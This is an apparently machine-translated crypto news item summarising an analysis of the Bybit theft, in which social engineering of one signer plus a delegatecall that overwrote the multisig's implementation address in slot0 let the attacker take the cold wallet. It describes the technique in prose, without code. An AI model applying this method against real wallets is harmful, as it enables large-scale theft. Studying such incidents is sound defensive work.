Dilation Effect analysis: Bybit attack uses social worker skills to bypass multi-signature security

Dilation Effect analysis pointed out that compared with previous similar incidents, in the Bybit incident, only one signer was needed to complete the attack because the attacker used a social worker skill. Analyzing the transactions on the chain, we can see that the attacker executes the transfer function of a malicious contract through delegatecall. The transfer code uses the SSTORE instruction to modify the value of slot0, thereby changing the implementation address of the Bybit cold wallet multi-signed contract to the attacker address. Only need to deal with the person/equipment who initiated the multi-signature transaction, and when several reviewers later see the transfer, they will greatly lower their vigilance. Because normal people see a transfer and think it is a transfer, but who knows it is actually a contract change?

read the original

Related articles

Bybit was stolen by nearly $1.5 billion, the largest theft in human history. How did North Korean hackers do it?

GuShiio.com Weekly Selected: Top 10 News in 20 U.S. States Promote Bitcoin Strategic Reserves, SEC Will Recognize Pledge, Binan Deals Rumors and News

Bybit stolen: US$1.46 billion flowed out (under update)

Popular Articles

1Germany’s Choice Party supports deregulation of Bitcoin and calls for disengagement from the euro zone

2DeepSeek overturned the “AI table”, and three major turning points determine the future of the big model

3Li Feifei’s team spent 146 yuan to reproduce the AI model, achieving performance comparable to DeepSeek.

4DeepSeek detonates reading stock price,”AI+IP” once again hits the entertainment industry

5DeepSeek may consider financing at a multi-billion-dollar valuation, and Alibaba’s share price immediately rose more than 6%